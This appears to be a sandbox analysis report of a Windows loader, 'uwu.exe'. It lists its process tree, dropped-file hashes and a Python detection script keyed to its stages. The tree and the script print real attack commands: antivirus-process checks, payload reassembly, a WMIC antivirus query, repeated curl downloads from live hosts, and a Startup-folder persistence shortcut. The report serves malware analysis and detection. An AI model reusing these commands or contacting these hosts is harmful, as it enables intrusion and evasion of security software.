Analysis

  • max time kernel
    146s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/11/2024, 16:39

General

  • Target

    uwu.exe

  • Size

    1.0MB

  • MD5

    fc877cda1618318751789044fb01a6bd

  • SHA1

    15f90c8f5c543964a33d62d6e68f62a6d2712262

  • SHA256

    ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

  • SHA512

    b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4

  • SSDEEP

    24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\uwu.exe
        "C:\Users\Admin\AppData\Local\Temp\uwu.exe"
        2⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:992
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:712
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1816
          • C:\Windows\SysWOW64\findstr.exe
            findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1084
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 226443
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2164
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "AthleticsTabletsUserImaging" Slovenia
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2156
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1924
          • C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
            Crossword.pif d
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:840
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\115 2>&1
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:740
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2148
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\115 > C:\Users\Admin\AppData\Local\temp\622
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1860
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nciks" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ctids" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2772
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spyii" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3032
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\agpeu" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gjlcd" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2856
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqtvf" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2668
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iioke" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2716
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ssyce" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2564
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rbetm" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2952
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvosy" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2224
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\acrxz" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1156
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwimx" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2508
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zqalu" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1456
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\salig" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:112
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyxgn" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2908
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gbhnc" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2192
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\skigw" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mmnzc" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2080
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cnjui" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2440
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wfmgw" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lzvtc" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:316
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wmknk" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:576
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sjngf" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bfarj" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1084
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jlmee" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2160
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 5
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1768
      • C:\Windows\SysWOW64\cmd.exe
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit
        2⤵
        • Drops startup file
        • System Location Discovery: System Language Discovery
        PID:2888
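Detection logic for the loader chain recorded in the tree above, as an added example that is not part of this report or of any sandbox vendor's tooling. It replays a constructed subset of the process-creation events (parent PID, PID, image and command line copied from the tree; the record layout is an assumed simplification of a Sysmon Event ID 1 feed) through one rule per stage: the copy-to-.cmd-and-run launcher, tasklist plus findstr checks against the security-product names the loader greps for, the copy /b reassembly of the payload from fragments, execution of a .pif from %TEMP%, the WMIC SecurityCenter2 AntiVirusProduct query, curl downloads into %TEMP%, and the Startup-folder .url drop. It also pulls the contacted hosts and the persistence target out of the command lines.

```python
"""Stage-by-stage detection over process-creation records (added example).

Records are constructed from the command lines in the report's process tree.
The (ppid, pid, image, cmdline) layout is an assumption of this example.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Proc:
    ppid: int
    pid: int
    image: str
    cmdline: str


# Constructed subset of the tree; PIDs and command lines as shown on the page.
SAMPLE_PROCS = [
    Proc(1204, 2624, r"C:\Users\Admin\AppData\Local\Temp\uwu.exe", r'"C:\Users\Admin\AppData\Local\Temp\uwu.exe"'),
    Proc(2624, 2804, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd'),
    Proc(2804, 992, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    Proc(2804, 712, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    Proc(2804, 1084, r"C:\Windows\SysWOW64\findstr.exe", 'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    Proc(2804, 1924, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d"),
    Proc(2804, 840, r"C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif", "Crossword.pif d"),
    Proc(840, 740, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\115 2>&1'),
    Proc(840, 2872, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nciks" "178.215.224.252/v10/ukyh.php?jspo=6"'),
    Proc(840, 2668, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqtvf" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"'),
    Proc(2624, 2888, r"C:\Windows\SysWOW64\cmd.exe", r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit'),
]

# Security-product process names taken from the loader's own findstr arguments.
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}

# "copy X X.cmd & X.cmd": an extensionless dropped file renamed to a batch script and run.
BATCH_RENAME_RUN = re.compile(r"copy\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd", re.I)
# findstr with a quoted list of names, case-insensitive; /I and -I are both accepted by findstr.
AV_GREP = re.compile(r'findstr\s+[/-]I\s+"([^"]+)"', re.I)
# "copy /b a + b + c ... out": payload rebuilt from several fragments.
BINARY_CONCAT = re.compile(r"copy\s+/b\s+\S+(?:\s*\+\s*\S+)+\s+\S+", re.I)
# WMI query of registered AV products via the SecurityCenter2 namespace.
SECURITYCENTER2 = re.compile(r"root\\SecurityCenter2\b.*\bAntiVirusProduct\b", re.I)
# curl writing its output (-o) to a file; group 1 = output path, group 2 = URL.
CURL_OUT = re.compile(r'\bcurl\b.*\s-o\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?', re.I)
# .url shortcut written into the per-user Startup folder.
STARTUP_URL = re.compile(r"\[InternetShortcut\].*\\Startup\\[^\"\\]+\.url", re.I)
STARTUP_TARGET = re.compile(r'URL="([^"]+)"')


def scan(procs):
    """Return (rule_name, pid) findings for every stage matched in the records."""
    by_ppid = {}
    for p in procs:
        by_ppid.setdefault(p.ppid, []).append(p)
    findings = []
    for p in procs:
        cmd, image = p.cmdline, p.image.lower()
        if BATCH_RENAME_RUN.search(cmd):
            findings.append(("batch_rename_and_run", p.pid))
        m = AV_GREP.search(cmd)
        if m and image.endswith("findstr.exe"):
            names = set(m.group(1).lower().split())
            # Only flag when a sibling tasklist.exe exists: the loader pipes tasklist into findstr.
            siblings = by_ppid.get(p.ppid, [])
            if names & AV_PROCESS_NAMES and any(s.image.lower().endswith("tasklist.exe") for s in siblings):
                findings.append(("av_process_grep", p.pid))
        if BINARY_CONCAT.search(cmd):
            findings.append(("binary_concat_payload", p.pid))
        if image.endswith(".pif") and "\\temp\\" in image:
            findings.append(("temp_pif_execution", p.pid))
        if SECURITYCENTER2.search(cmd):
            findings.append(("securitycenter2_av_query", p.pid))
        m = CURL_OUT.search(cmd)
        if m and "\\temp\\" in m.group(1).lower():
            findings.append(("curl_download_to_temp", p.pid))
        if STARTUP_URL.search(cmd):
            findings.append(("startup_url_shortcut", p.pid))
    return findings


def extract_iocs(procs):
    """Collect contacted hosts (from curl) and the Startup shortcut's target path."""
    hosts, targets = set(), set()
    for p in procs:
        m = CURL_OUT.search(p.cmdline)
        if m:
            url = m.group(2)
            # Scheme-less URLs (as in the report) need a leading "//" for urlsplit to see the host.
            hosts.add(urlsplit(url if "://" in url else "//" + url).hostname)
        m = STARTUP_TARGET.search(p.cmdline)
        if m:
            targets.add(m.group(1))
    return {"hosts": hosts, "startup_targets": targets}


if __name__ == "__main__":
    for rule, pid in scan(SAMPLE_PROCS):
        print(f"{rule:28s} pid={pid}")
    print(extract_iocs(SAMPLE_PROCS))
```

The findstr rule deliberately requires a sibling tasklist.exe under the same parent, because findstr over an AV name list is only suspicious in combination with the process enumeration it filters; the other rules key on command-line shape alone, so the tasklist and findstr processes themselves are otherwise left unflagged.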

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\226443\d

            Filesize

            546KB

            MD5

            7e6971c69a6ca7279da0e89b4b388189

            SHA1

            894fdd50dead4f46ac677ad06d1455943167ae1f

            SHA256

            1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c

            SHA512

            06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

          • C:\Users\Admin\AppData\Local\Temp\Column

            Filesize

            75KB

            MD5

            d05e382bb4f1e9bb4bce6108e318ea6b

            SHA1

            ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a

            SHA256

            ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51

            SHA512

            742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

          • C:\Users\Admin\AppData\Local\Temp\Environment

            Filesize

            64KB

            MD5

            b6024d20dba6454f8e2df9086438fce7

            SHA1

            3edb339cc5960a05ab3d1ab615d4152b092ee832

            SHA256

            a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf

            SHA512

            651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

          • C:\Users\Admin\AppData\Local\Temp\Events

            Filesize

            95KB

            MD5

            67498253ff01bc79ab26bdaa2183b367

            SHA1

            5c6efd758ab0b450c8a9ecaeb108e9272535a3b3

            SHA256

            60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8

            SHA512

            75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

          • C:\Users\Admin\AppData\Local\Temp\Explanation

            Filesize

            14KB

            MD5

            773bc1cb8deb9ff09bc892af84ae5681

            SHA1

            09f815af8eca0c373302204f58b47f591a300b7c

            SHA256

            f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42

            SHA512

            e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

          • C:\Users\Admin\AppData\Local\Temp\Heather

            Filesize

            52KB

            MD5

            5ebe13d4704e614c4e597bed036a2591

            SHA1

            b6a40f939e04c997482307fb14126e716efafb2b

            SHA256

            3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712

            SHA512

            ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

          • C:\Users\Admin\AppData\Local\Temp\Index

            Filesize

            902KB

            MD5

            358194c0c510ff11f8f3d68afe5ea595

            SHA1

            e801c32a9b1414741a6fb2aec201d979ec927bbf

            SHA256

            cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b

            SHA512

            8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

          • C:\Users\Admin\AppData\Local\Temp\Law

            Filesize

            72KB

            MD5

            a57501ae52b7c24db316a678306f8083

            SHA1

            3cf2b2942943163781db70f6759153214fcd1c37

            SHA256

            8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c

            SHA512

            306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

          • C:\Users\Admin\AppData\Local\Temp\Merit

            Filesize

            82KB

            MD5

            f8fef0dc6066b6bdae93db3c69368170

            SHA1

            e4d55d4c83b049968d5a6f4eee6ad9efe86dff79

            SHA256

            d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374

            SHA512

            274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

          • C:\Users\Admin\AppData\Local\Temp\Slovenia

            Filesize

            18KB

            MD5

            1332165a90a96d564adbea76842051de

            SHA1

            6a99c791f8a492ecccf5ada0b77be493a61b1bc9

            SHA256

            e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36

            SHA512

            d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

          • C:\Users\Admin\AppData\Local\Temp\Tackle

            Filesize

            92KB

            MD5

            a28ef671a2529783f795e0ce242b69a7

            SHA1

            3605589e946dcac4492b8a7799660ff4f1a323d1

            SHA256

            9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745

            SHA512

            b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

          • C:\Users\Admin\AppData\Local\Temp\Tuition

            Filesize

            26KB

            MD5

            cec47644f0f51a10cce5656a87673d71

            SHA1

            b7abebf08227a9860d7300128a9161841a4b191f

            SHA256

            34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e

            SHA512

            42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

          • C:\Users\Admin\AppData\Local\temp\115

            Filesize

            32B

            MD5

            b65e9213dae00101a52d72b56120ff81

            SHA1

            d52caec94e56a19cca2bcc6e38dc780b1cb90027

            SHA256

            dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740

            SHA512

            09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

          • \Users\Admin\AppData\Local\Temp\226443\Crossword.pif

            Filesize

            921KB

            MD5

            78ba0653a340bac5ff152b21a83626cc

            SHA1

            b12da9cb5d024555405040e65ad89d16ae749502

            SHA256

            05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

            SHA512

            efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

          • memory/840-622-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-624-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-623-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-626-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-625-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-627-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB